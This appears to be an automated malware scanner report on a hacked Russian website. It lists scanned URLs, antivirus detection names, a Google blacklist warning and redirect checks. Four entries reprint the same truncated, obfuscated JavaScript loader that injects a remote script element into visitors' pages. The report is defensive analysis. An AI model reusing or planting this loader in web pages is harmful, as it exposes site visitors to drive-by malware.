
Malware Scanner report for eng.seomaker.ru

Malicious/Suspicious/Total urls checked
4/0/15
4 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "eng.seomaker.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK


Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=eng.seomaker.ru

Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request | Server response | Status
http://eng.seomaker.ru/
200 OK
Content-Length: 13518
Content-Type: text/html
malicious
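Malicious code - confirmed by antiviruses (see below). The excerpt is an obfuscated script loader: the helper Z() strips filler characters from strings to hide DOM method names (the visible one decodes to "createElement"), and the tail creates an element, sets its "defer" and "src" attributes and appends it to document.body inside a try/catch that silences errors. The element type and the remote URL are in the skipped bytes. The many "var x;if(x!=...){...}" statements appear to be padding that does not affect the result. The same block is reported on every infected URL below, and all of them return 13518 bytes, so they are probably the same index page.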

function y() {this.g="";this.S='';var z='[';var I=new String();var m;if(m!='ON'){m=''};var n=RegExp;var F='g';this.gz="";var SK;if(SK!=''){SK='v'};var _=']';var c='replace';var cU;if(cU!='' && cU!='s'){cU='oe'};var Bs;if(Bs!=''){Bs='Ny'};function Z(W,ca){this.v_='';this.k_="";var P;if(P!='gL'){P=''};var C=z;var GR=new String();C+=ca;C+=_;var T=new n(C, F);return W[c](T, I);var tX=new Array();var TW;if(TW!=''){TW='Y'};};this.GL='';var u="";var O=Z('cMrYePaZtMePEolMePmYePnZtY',"YoPMZ");var
... 1052 bytes are skipped ...
ument[O](rz);this.NK='';var yo;if(yo!='' && yo!='zi'){yo='gi'};var bw;if(bw!=''){bw='yy'};Zx(rJ,'defer',([1][0]));var m_="";var AH="";Zx(rJ,'src',nz);var bm;if(bm!='iw' && bm != ''){bm=null};var ij=new String();document.body.appendChild(rJ);this.bR='';} catch(o){this.rD="";};};var Bn;if(Bn!='' && Bn!='uQ'){Bn=''};function Zx(J,K,M){J.setAttribute(K, M);}var Co;if(Co!='cC' && Co!='yZ'){Co='cC'};var mD;if(mD!='yS'){mD=''};};var Rg;if(Rg!=''){Rg='qF'};y();var xQt="";

Antivirus reports:

Avast
JS:Illredir-W [Trj]
TrendMicro-HouseCall
JS_ONLOAD.SMD
DrWeb
JS.Redirector.based.2
TrendMicro
JS_ONLOAD.SMD
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
Microsoft
Trojan:JS/Redirector.GM
Fortinet
JS/Crypt.BBEA!tr
NANO-Antivirus
Trojan.Script.Heuristic-js.iacgm
VIPRE
Trojan.JS.Redirector.bh (v)
AVG
JS/Dropper
Norman
Redir.IN
Sophos
Troj/JSRedir-AU
GData
JS:Illredir-W
Agnitum
JS.Redirector.Gen
ESET-NOD32
JS/TrojanDownloader.Agent.NSM

http://eng.seomaker.ru/index.htm
200 OK
Content-Length: 13518
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function y() {this.g="";this.S='';var z='[';var I=new String();var m;if(m!='ON'){m=''};var n=RegExp;var F='g';this.gz="";var SK;if(SK!=''){SK='v'};var _=']';var c='replace';var cU;if(cU!='' && cU!='s'){cU='oe'};var Bs;if(Bs!=''){Bs='Ny'};function Z(W,ca){this.v_='';this.k_="";var P;if(P!='gL'){P=''};var C=z;var GR=new String();C+=ca;C+=_;var T=new n(C, F);return W[c](T, I);var tX=new Array();var TW;if(TW!=''){TW='Y'};};this.GL='';var u="";var O=Z('cMrYePaZtMePEolMePmYePnZtY',"YoPMZ");var
... 1052 bytes are skipped ...
ument[O](rz);this.NK='';var yo;if(yo!='' && yo!='zi'){yo='gi'};var bw;if(bw!=''){bw='yy'};Zx(rJ,'defer',([1][0]));var m_="";var AH="";Zx(rJ,'src',nz);var bm;if(bm!='iw' && bm != ''){bm=null};var ij=new String();document.body.appendChild(rJ);this.bR='';} catch(o){this.rD="";};};var Bn;if(Bn!='' && Bn!='uQ'){Bn=''};function Zx(J,K,M){J.setAttribute(K, M);}var Co;if(Co!='cC' && Co!='yZ'){Co='cC'};var mD;if(mD!='yS'){mD=''};};var Rg;if(Rg!=''){Rg='qF'};y();var xQt="";

Antivirus reports:

Avast
JS:Illredir-W [Trj]
TrendMicro-HouseCall
JS_ONLOAD.SMD
DrWeb
JS.Redirector.based.2
TrendMicro
JS_ONLOAD.SMD
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
Microsoft
Trojan:JS/Redirector.GM
Fortinet
JS/Crypt.BBEA!tr
NANO-Antivirus
Trojan.Script.Heuristic-js.iacgm
VIPRE
Trojan.JS.Redirector.bh (v)
AVG
JS/Dropper
Norman
Redir.IN
Sophos
Troj/JSRedir-AU
GData
JS:Illredir-W
Agnitum
JS.Redirector.Gen
ESET-NOD32
JS/TrojanDownloader.Agent.NSM

http://eng.seomaker.ru/map.htm
404 Not Found
Content-Length: 205
Content-Type: text/html
clean
http://eng.seomaker.ru/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean
http://eng.seomaker.ru/94303Directory.php
200 OK
Content-Length: 15147
Content-Type: text/html
clean
http://eng.seomaker.ru/?CategoryID=2
200 OK
Content-Length: 13518
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function y() {this.g="";this.S='';var z='[';var I=new String();var m;if(m!='ON'){m=''};var n=RegExp;var F='g';this.gz="";var SK;if(SK!=''){SK='v'};var _=']';var c='replace';var cU;if(cU!='' && cU!='s'){cU='oe'};var Bs;if(Bs!=''){Bs='Ny'};function Z(W,ca){this.v_='';this.k_="";var P;if(P!='gL'){P=''};var C=z;var GR=new String();C+=ca;C+=_;var T=new n(C, F);return W[c](T, I);var tX=new Array();var TW;if(TW!=''){TW='Y'};};this.GL='';var u="";var O=Z('cMrYePaZtMePEolMePmYePnZtY',"YoPMZ");var
... 1052 bytes are skipped ...
ument[O](rz);this.NK='';var yo;if(yo!='' && yo!='zi'){yo='gi'};var bw;if(bw!=''){bw='yy'};Zx(rJ,'defer',([1][0]));var m_="";var AH="";Zx(rJ,'src',nz);var bm;if(bm!='iw' && bm != ''){bm=null};var ij=new String();document.body.appendChild(rJ);this.bR='';} catch(o){this.rD="";};};var Bn;if(Bn!='' && Bn!='uQ'){Bn=''};function Zx(J,K,M){J.setAttribute(K, M);}var Co;if(Co!='cC' && Co!='yZ'){Co='cC'};var mD;if(mD!='yS'){mD=''};};var Rg;if(Rg!=''){Rg='qF'};y();var xQt="";

Antivirus reports:

Avast
JS:Illredir-W [Trj]
TrendMicro-HouseCall
JS_ONLOAD.SMD
DrWeb
JS.Redirector.based.2
TrendMicro
JS_ONLOAD.SMD
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
Microsoft
Trojan:JS/Redirector.GM
Fortinet
JS/Crypt.BBEA!tr
NANO-Antivirus
Trojan.Script.Heuristic-js.iacgm
VIPRE
Trojan.JS.Redirector.bh (v)
AVG
JS/Dropper
Norman
Redir.IN
Sophos
Troj/JSRedir-AU
GData
JS:Illredir-W
Agnitum
JS.Redirector.Gen
ESET-NOD32
JS/TrojanDownloader.Agent.NSM

http://eng.seomaker.ru/belinkeddirectory.php
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://eng.seomaker.ru/linka.php
200 OK
Content-Length: 88
Content-Type: text/html
clean
http://eng.seomaker.ru/linkexchange.php
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://eng.seomaker.ru/links1.php
200 OK
Content-Length: 147
Content-Type: text/html
clean
http://eng.seomaker.ru/resources.php
200 OK
Content-Length: 0
Content-Type: text/html
clean
http://eng.seomaker.ru/SC.php
200 OK
Content-Length: 3288
Content-Type: text/html
clean
http://eng.seomaker.ru/tels.php
200 OK
Content-Length: 4299
Content-Type: text/html
clean
http://eng.seomaker.ru/?this=2
200 OK
Content-Length: 13518
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function y() {this.g="";this.S='';var z='[';var I=new String();var m;if(m!='ON'){m=''};var n=RegExp;var F='g';this.gz="";var SK;if(SK!=''){SK='v'};var _=']';var c='replace';var cU;if(cU!='' && cU!='s'){cU='oe'};var Bs;if(Bs!=''){Bs='Ny'};function Z(W,ca){this.v_='';this.k_="";var P;if(P!='gL'){P=''};var C=z;var GR=new String();C+=ca;C+=_;var T=new n(C, F);return W[c](T, I);var tX=new Array();var TW;if(TW!=''){TW='Y'};};this.GL='';var u="";var O=Z('cMrYePaZtMePEolMePmYePnZtY',"YoPMZ");var
... 1052 bytes are skipped ...
ument[O](rz);this.NK='';var yo;if(yo!='' && yo!='zi'){yo='gi'};var bw;if(bw!=''){bw='yy'};Zx(rJ,'defer',([1][0]));var m_="";var AH="";Zx(rJ,'src',nz);var bm;if(bm!='iw' && bm != ''){bm=null};var ij=new String();document.body.appendChild(rJ);this.bR='';} catch(o){this.rD="";};};var Bn;if(Bn!='' && Bn!='uQ'){Bn=''};function Zx(J,K,M){J.setAttribute(K, M);}var Co;if(Co!='cC' && Co!='yZ'){Co='cC'};var mD;if(mD!='yS'){mD=''};};var Rg;if(Rg!=''){Rg='qF'};y();var xQt="";

Antivirus reports:

Avast
JS:Illredir-W [Trj]
TrendMicro-HouseCall
JS_ONLOAD.SMD
DrWeb
JS.Redirector.based.2
TrendMicro
JS_ONLOAD.SMD
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
Microsoft
Trojan:JS/Redirector.GM
Fortinet
JS/Crypt.BBEA!tr
NANO-Antivirus
Trojan.Script.Heuristic-js.iacgm
VIPRE
Trojan.JS.Redirector.bh (v)
AVG
JS/Dropper
Norman
Redir.IN
Sophos
Troj/JSRedir-AU
GData
JS:Illredir-W
Agnitum
JS.Redirector.Gen
ESET-NOD32
JS/TrojanDownloader.Agent.NSM

http://eng.seomaker.ru/TopResources.php
200 OK
Content-Length: 41857
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: eng.seomaker.ru

Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Tue, 26 Aug 2014 01:39:23 GMT
Accept-Ranges: bytes
ETag: "62a3a127-34ce-480429c0ae840"
Server: Apache
Content-Length: 13518
Content-Type: text/html; charset=windows-1251
Expires: Tue, 26 Aug 2014 01:39:23 GMT
Last-Modified: Tue, 23 Feb 2010 11:11:21 GMT

...13518 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: eng.seomaker.ru
Referer: http://www.google.com/search?q=eng.seomaker.ru

Result:
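The result is similar to the first query. There are no suspicious redirects found. Note that this check appears to compare HTTP responses only, for a plain visit and a visit with a Google referer. The script injection reported under "Scanned pages/files" acts in the visitor's browser, so a clean result here does not contradict the antivirus "Redirector" detections above.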